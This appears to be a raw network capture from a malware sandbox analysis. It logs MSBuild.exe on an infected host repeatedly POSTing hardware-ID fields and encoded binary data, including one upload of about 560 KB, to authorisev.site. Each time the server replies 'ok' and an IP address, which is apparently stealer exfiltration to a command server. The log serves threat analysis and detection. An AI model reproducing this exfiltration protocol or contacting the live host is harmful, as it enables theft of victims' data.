2024-11-01 09:50:57 UTC	1369	IN	Data Raw: 6c 62 46 35 49 52 35 4a 47 65 64 67 4b 5a 42 68 55 4c 56 4d 41 6e 79 4e 2f 77 66 39 59 33 6d 72 55 63 56 6c 45 74 72 78 4d 79 69 52 6f 7a 75 68 6a 46 75 4a 4e 33 4b 36 6b 57 61 44 49 4a 39 4e 50 38 2f 2f 77 50 32 6b 4b 6d 33 41 51 44 63 51 58 57 4f 6e 76 42 64 6c 2b 4f 44 4f 58 73 70 6a 34 57 69 54 59 68 4d 33 44 59 4d 39 6a 58 33 47 2f 4b 5a 36 4b 56 4f 47 4a 78 44 65 63 66 55 76 51 2f 4c 6f 34 38 68 50 48 2f 64 73 36 5a 4a 73 30 2f 4d 66 52 6d 37 4a 62 4d 53 39 39 2b 78 36 45 34 4c 6b 55 35 39 7a 73 75 32 52 49 54 69 69 7a 6c 38 4a 4a 32 42 6f 55 32 45 53 39 63 33 44 2f 77 75 2b 78 48 70 6e 2b 57 73 44 31 66 63 51 57 47 4f 6e 76 42 2f 68 75 69 45 4f 58 45 79 33 5a 76 6b 57 38 4a 4c 31 6e 31 65 74 54 54 34 48 76 32 55 36 71 74 42 45 70 5a 4a 64 73 54 41 Data Ascii: lbF5IR5JGedgKZBhULVMAnyN/wf9Y3mrUcVlEtrxMyiRozuhjFuJN3K6kWaDIJ9NP8//wP2kKm3AQDcQXWOnvBdl+ODOXspj4WiTYhM3DYM9jX3G/KZ6KVOGJxDecfUvQ/Lo48hPH/ds6ZJs0/MfRm7JbMS99+x6E4LkU59zsu2RITiizl8JJ2BoU2ES9c3D/wu+xHpn+WsD1fcQWGOnvB/huiEOXEy3ZvkW8JL1n1etTT4Hv2U6qtBEpZJdsTA
2024-11-01 09:50:57 UTC	1369	IN	Data Raw: 4b 46 4d 6e 42 6c 6e 49 6d 36 52 63 49 43 6d 6a 74 47 72 57 79 39 56 66 2b 4f 71 66 41 66 53 38 63 54 4b 70 6d 57 34 6c 44 4c 2b 73 67 76 50 48 2f 50 79 75 70 51 77 68 53 61 65 67 58 6e 4c 76 55 57 37 5a 79 75 6c 6e 45 35 6c 30 70 36 77 73 65 33 44 38 75 6a 68 33 6b 6b 48 74 32 48 75 46 44 4e 58 63 77 77 46 76 4a 77 2b 77 54 32 6b 36 6e 6d 44 31 57 59 54 58 58 4c 77 61 41 41 6c 2f 4f 44 4e 57 70 72 6d 5a 62 71 44 4d 4a 64 30 54 49 55 2b 7a 75 38 42 4f 32 53 2b 61 74 4b 48 74 42 4f 61 4d 50 4b 38 41 48 46 39 6f 4d 31 65 69 71 49 79 37 74 55 67 56 72 64 63 51 37 6b 4d 66 39 56 78 4e 47 70 73 41 39 42 33 48 4e 36 77 4d 69 33 57 5a 53 75 71 44 4a 77 4a 4a 47 46 72 51 4c 4d 44 4e 78 39 58 71 5a 79 73 78 48 71 33 37 48 34 48 55 4c 4a 46 53 36 65 6c 4b 38 42 6e Data Ascii: KFMnBlnIm6RcICmjtGrWy9Vf+OqfAfS8cTKpmW4lDL+sgvPH/PyupQwhSaegXnLvUW7ZyulnE5l0p6wse3D8ujh3kkHt2HuFDNXcwwFvJw+wT2k6nmD1WYTXXLwaAAl/ODNWprmZbqDMJd0TIU+zu8BO2S+atKHtBOaMPK8AHF9oM1eiqIy7tUgVrdcQ7kMf9VxNGpsA9B3HN6wMi3WZSuqDJwJJGFrQLMDNx9XqZysxHq37H4HULJFS6elK8Bn
2024-11-01 09:50:57 UTC	1369	IN	Data Raw: 38 66 38 37 4b 36 6c 44 43 46 4a 70 36 43 50 67 39 38 42 76 34 6a 66 75 75 54 41 2b 66 41 55 66 77 34 37 31 43 67 4f 32 50 42 30 49 47 6c 35 53 6e 54 59 56 79 35 41 6f 58 38 69 79 78 4d 2f 69 4a 36 75 67 42 57 59 51 47 49 59 37 6e 75 6c 2b 49 37 49 39 35 4d 6d 65 5a 78 50 49 43 70 30 48 58 4f 41 6a 79 66 74 49 66 36 35 4c 6d 72 77 39 58 33 45 6f 35 6c 6f 61 78 52 5a 58 75 68 7a 34 77 49 49 65 44 36 67 7a 43 51 70 70 6c 52 76 51 32 34 78 6a 30 6d 4b 57 75 51 52 66 63 57 54 66 58 68 71 59 50 33 62 44 47 65 57 35 6e 78 63 54 74 54 49 39 4e 32 54 4d 46 35 79 37 31 46 75 32 63 72 70 5a 78 50 4a 46 4c 66 4d 44 42 6a 6e 47 6b 36 5a 67 30 63 79 44 66 70 4b 31 55 67 58 4c 6b 43 68 66 79 4c 4c 45 7a 2b 49 6e 71 36 41 46 5a 68 41 59 68 6a 75 65 36 58 34 6a 73 6a 33 Data Ascii: 8f87K6lDCFJp6CPg98Bv4jfuuTA+fAUfw471CgO2PB0IGl5SnTYVy5AoX8iyxM/iJ6ugBWYQGIY7nul+I7I95MmeZxPICp0HXOAjyftIf65Lmrw9X3Eo5loaxRZXuhz4wIIeD6gzCQpplRvQ24xj0mKWuQRfcWTfXhqYP3bDGeW5nxcTtTI9N2TMF5y71Fu2crpZxPJFLfMDBjnGk6Zg0cyDfpK1UgXLkChfyLLEz+Inq6AFZhAYhjue6X4jsj3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	104.21.85.194	443	7552	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 09:50:58 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: authorisev.site
2024-11-01 09:50:58 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-11-01 09:50:58 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-11-01 09:50:58 UTC	1009	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 09:50:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u6gsf2km28l620bmdno9mevahi; expires=Tue, 25-Feb-2025 03:37:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YKZe5cwIt096MEYLLIa1Exuee4Isxxp15WU4KnVyN0tLneJHfPda13DH%2BBYZ8D7JHbMmkK22C5Z2HOf2CoRlWKMfKUV5NotvmwOjF3ePlq3MPOugPD5WP0ACXdmOfV98TlU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dbafbce1e636be4-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1046&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19208&delivery_rate=2714151&cwnd=251&unsent_bytes=0&cid=e78afba61c4eb225&ts=674&x=0"
2024-11-01 09:50:58 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 0d 0a Data Ascii: 11ok 173.254.250.82
2024-11-01 09:50:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49749	104.21.85.194	443	7552	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 09:50:59 UTC	369	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: authorisev.site
2024-11-01 09:50:59 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-11-01 09:51:00 UTC	1011	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 09:50:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jp8p2as93q4a8bjh9dkq61gmah; expires=Tue, 25-Feb-2025 03:37:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KyA2JNLcaeFabk0cUjtHGY8OgTf3bJx%2Fwbi1i8jkFkX%2FQGZFsnn6WXyh5yzSaCywUMD7RZAGiGlLSlAeCEhzq8KMAAqf%2BL1iilO4EkOBFILt6lIyAxyTkbqyxv3PqSgHK64%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dbafbd65a414772-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2838&recv_bytes=9806&delivery_rate=2395368&cwnd=239&unsent_bytes=0&cid=6639c4cc97cc4491&ts=544&x=0"
2024-11-01 09:51:00 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 0d 0a Data Ascii: 11ok 173.254.250.82
2024-11-01 09:51:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49755	104.21.85.194	443	7552	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 09:51:00 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: authorisev.site
2024-11-01 09:51:00 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-11-01 09:51:00 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-11-01 09:51:01 UTC	1017	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 09:51:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=31fdgrbvb5f12pfprslqjbm27n; expires=Tue, 25-Feb-2025 03:37:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Y7Vn%2BthisQCGgC2mpVCfdktv3v4Q9LO2Zb%2FPfJGbOrPBab%2FBsjLvjDZakxBTroW7Jk7YQMv0sYU1pgJf4X4mDekljDJfQUpGfqsCAmDl2cQG%2Bv7wkm1ZZW%2FQx5raawd5i0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dbafbddf9d1468a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1927&sent=13&recv=27&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21482&delivery_rate=1494324&cwnd=247&unsent_bytes=0&cid=e0d1e84144c3b454&ts=843&x=0"
2024-11-01 09:51:01 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 0d 0a Data Ascii: 11ok 173.254.250.82
2024-11-01 09:51:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49766	104.21.85.194	443	7552	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 09:51:02 UTC	369	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1233 Host: authorisev.site
2024-11-01 09:51:02 UTC	1233	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-11-01 09:51:02 UTC	1011	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 09:51:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2bm7qct773o70o4h7di9qbbfc7; expires=Tue, 25-Feb-2025 03:37:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kMGsLYmF9x68kyHEhRbGJterNNgYin5DS8Zkf%2FQ5NEtWXXF1XHe3lz6KgCPSj2PPjHJGfFR78mUN0Fmb2QxcuqJ%2BH%2BxE6e25O1oxtbwK0Kjot0P6L9HDxsnEQTpKby%2FBasY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dbafbe77a68e736-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1361&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2238&delivery_rate=2028011&cwnd=59&unsent_bytes=0&cid=165c5b1ef8db7c12&ts=721&x=0"
2024-11-01 09:51:02 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 0d 0a Data Ascii: 11ok 173.254.250.82
2024-11-01 09:51:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49777	104.21.85.194	443	7552	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 09:51:03 UTC	371	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 563570 Host: authorisev.site
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: 2a 5e 2d 4f 11 53 f2 55 fe 38 36 a4 04 ac a5 ea 4a c6 09 94 e5 a9 96 1c 8e 11 fd 0c 0e dc 21 b2 1c f7 4e dc 49 b6 c6 8b 5d 71 34 64 b5 c6 03 16 6e 4f b4 fc 61 de ef 17 f9 71 6e fd ea 56 2d 6b 52 11 a4 31 b0 b4 d7 cd 81 0b ea 77 bf f5 7e 2e 75 cd e3 ca af 39 5f 87 8b 1f 1f cf 31 96 12 3f 5e 29 b0 1d be 5c a2 a8 53 30 27 ea 26 d9 f3 02 14 de 1b 7c 9f 2e 06 d6 3f eb 46 ad 20 b6 bf c2 ac 91 9b da 55 65 4a aa 54 39 25 f3 1e 14 18 b8 a8 44 74 6a d1 32 3b fb a7 04 0a a3 b3 3c 60 07 7e 46 8a ec 0c 4a 90 62 4e 93 d1 67 15 54 ea e5 26 9c 52 f9 0f 09 e8 55 ae cf cc b9 ec 1b 30 8e f4 cd 70 6a 5b 73 15 f5 e6 17 02 ef 01 cc eb 3a 5f c0 cc ac 72 b4 cb af f2 67 83 b6 50 e4 a3 19 92 39 d7 cf 2f 92 c1 a2 8c d9 1d fd 9a ab e8 ac 76 11 a4 ae 74 d0 ef 1d ae 43 b9 5e d4 a3 e6 Data Ascii: *^-OSU86J!NI]q4dnOaqnV-kR1w~.u9_1?^)\S0'&\|.?F UeJT9%Dtj2;<`~FJbNgT&RU0pj[s:_rgP9/vtC^
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: fa 20 ed c0 75 15 4b 18 b5 06 cb ee 19 f5 6b 71 a0 3f 9f cf f7 17 77 0a 29 aa 9a 79 15 37 62 93 e2 48 5b af a2 ff c5 cc a4 5b 4f 68 d3 d9 1e b7 64 ef 4b da 3f 38 43 2d e0 60 43 dc c0 8f fa fe 03 00 c3 5f e5 92 5d e5 3d 77 ea f0 4e d5 48 c5 fe 94 ca b2 30 df ec ed 4c 03 1b da b1 8c 9a fa 9a da 3b 97 b8 18 63 a3 3c 12 e5 7d e7 1d 3e f7 d5 d4 5e ab 79 51 b9 b0 2b 4d 0d be fe 15 5e 46 4d 28 1b dd 5a db bc 45 e2 02 e4 5f 6c 78 c0 ee 71 ac ea 8e d3 6b cf 75 f2 05 e9 b2 22 36 82 e2 b6 85 06 97 9f 70 74 21 a0 26 82 3f 87 31 71 50 96 a8 34 27 91 0b 60 41 d5 a5 9d 0b ff 49 87 23 bd f9 18 15 8e 46 01 c9 67 f0 1c b9 77 88 73 e3 b0 f8 55 e8 1c cb 41 4a 38 51 9d 23 3e 35 dc 78 b9 90 97 67 fa 61 04 b4 e5 c1 ef 14 1e d0 2b 33 e0 3e 7a 36 ee f4 51 e4 e5 01 74 96 49 67 ce Data Ascii: uKkq?w)y7bH[[OhdK?8C-`C_]=wNH0L;c<}>^yQ+M^FM(ZE_lxqku"6pt!&?1qP4'`AI#FgwsUAJ8Q#>5xga+3>z6QtIg
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: 3d 56 dd 93 1a 3b bc c4 ef 7f bd 8e 5a 78 ae 1e 17 43 6c 00 db 51 f5 3f 48 4a 1e cc 83 13 2e 0e 0a 8a 0a 8e 15 de b7 cb e4 7c 2f 1f c6 c4 9d a6 a3 82 1c 0e a7 ee 59 35 d7 b2 cf fa 4c 9b 90 6d f1 a5 94 41 be 97 bd e5 c2 43 be b3 81 88 46 fc 5c ea 77 a3 10 c1 67 d2 2d 1a 57 ce 09 f6 40 b8 2a 29 53 4c 0a 17 38 7a a0 78 37 8a db 1b 50 a8 0b 2d 63 b7 ea d1 75 75 b9 08 3a 2e 35 de 7e b4 10 ed f5 7e 64 63 dc d0 5a fd 8a 35 6d b9 77 42 bd de 50 19 7d d7 73 73 e0 39 49 2d c8 17 f8 37 62 04 74 29 e7 f0 6d a9 95 ca 78 e8 5e c8 6d 63 6f 83 e1 d4 3d 03 11 93 57 cb dc 1b ec cf 6a 44 5c 04 c1 08 26 8f 82 fa 0e 53 88 2c cc cc 6a 04 89 ff fe e2 cb d6 42 9a fd 10 7b 80 df de b6 72 e6 84 09 25 7b 66 d9 46 f0 c0 95 d3 0e 8e 2b ec 40 56 72 20 73 74 96 15 d0 04 97 ed 44 0d 04 Data Ascii: 